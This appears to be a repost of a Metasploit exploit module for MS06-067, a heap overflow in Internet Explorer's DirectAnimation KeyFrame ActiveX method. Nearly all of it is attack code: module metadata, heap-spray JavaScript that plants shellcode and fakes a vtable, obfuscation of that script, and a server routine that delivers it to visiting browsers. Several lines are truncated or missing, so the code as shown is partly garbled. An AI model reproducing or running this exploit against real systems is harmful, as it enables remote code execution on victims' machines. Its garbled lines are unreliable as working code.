Microsoft Internet Explorer – Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)

  • 作者: Metasploit
    日期: 2010-07-16
  • 类别:
  • 来源:
  • ##
    # $Id: ms06_067_keyframe.rb 9842 2010-07-16 02:33:25Z jduck $
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    require 'msf/core'
    class Metasploit3 < Msf::Exploit::Remote
    	Rank = NormalRanking
    	# This module acts as an HTTP server
    	include Msf::Exploit::Remote::HttpServer::HTML
    	# Superceded by ms10_018_ie_behaviors, disable for BrowserAutopwn
    	#include Msf::Exploit::Remote::BrowserAutopwn
    	#	:ua_name=> HttpClients::IE,
    	#	:ua_minver=> "6.0",
    	#	:javascript => true,
    	#	:os_name=> OperatingSystems::WINDOWS,
    	#	:vuln_test=> 'KeyFrame',
    	#	:classid=> 'DirectAnimation.PathControl',
    	#	:rank => NormalRanking# reliable memory corruption
    	def initialize(info = {})
    			'Name' => 'Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability',
    			'Description'=> %q{
    				This module exploits a heap overflow vulnerability in the KeyFrame method of the
    				direct animation ActiveX control.This is a port of the exploit implemented by
    				Alexander Sotirov.
    			'License'=> MSF_LICENSE,
    			'Author' =>
    					# Did all the hard work
    					'Alexander Sotirov <>',
    					# Integrated into msf
    			'Version'=> '$Revision: 9842 $',
    			'References' =>
    					[ 'CVE', '2006-4777' ],
    					[ 'OSVDB', '28842' ],
    					[ 'BID', '20047' ],
    					[ 'MSB', 'MS06-067' ],
    					[ 'URL', '' ]
    			'DefaultOptions' =>
    					'EXITFUNC' => 'process',
    					# Maximum payload size is limited by heaplib
    					'Space' => 870,
    					'MinNops' => 32,
    							'ConnectionType' => '-find',
    					'StackAdjustment' => -3500,
    			'Platform' => 'win',
    					[ 'Windows 2000/XP/2003 Universal', { }],
    			'DisclosureDate' => 'Nov 14 2006',
    			'DefaultTarget'=> 0))
    	def on_request_uri(cli, request)
    		return if ((p = regenerate_payload(cli)) == nil)
    		print_status("Sending #{} to #{cli.peerhost}:#{cli.peerport}...")
    		# This is taken directly from Alex's exploit -- all credit goes to him.
    		trigger_js = heaplib(
    			"var target = new ActiveXObject('DirectAnimation.PathControl');\n" +
    			"var heap = new;\n" +
    			"var shellcode = unescape('#{Rex::Text.to_unescape(p.encoded)}');\n" +
    			"var jmpecx = 0x4058b5;\n" +
    			"var vtable = heap.vtable(shellcode, jmpecx);\n" +
    			"var fakeObjPtr = heap.lookasideAddr(vtable);\n" +
    			"var fakeObjChunk = heap.padding((0x200c-4)/2) + heap.addr(fakeObjPtr) + heap.padding(14/2);\n" +
    			"heap.gc();\n" +
    			"for (var i = 0; i < 100; i++)\n" +
    			"heap.alloc(vtable)\n" +
    			"heap.lookaside(vtable);\n" +
    			"for (var i = 0; i < 100; i++)\n" +
    			"heap.alloc(0x2010)\n" +
    			"heap.freeList(fakeObjChunk, 2);\n" +
    			"target.KeyFrame(0x40000801, new Array(1), new Array(1));\n" +
    			"delete heap;\n")
    		# Obfuscate it up a bit
    		trigger_js = obfuscate_js(trigger_js,
    			'Symbols' =>
    					'Variables' => [ 'target', 'heap', 'shellcode', 'jmpecx', 'fakeObjPtr', 'fakeObjChunk' ]
    		# Fire off the page to the client
    			"<html><script language='javascript'>#{trigger_js}</script></html>")
    		# Handle the payload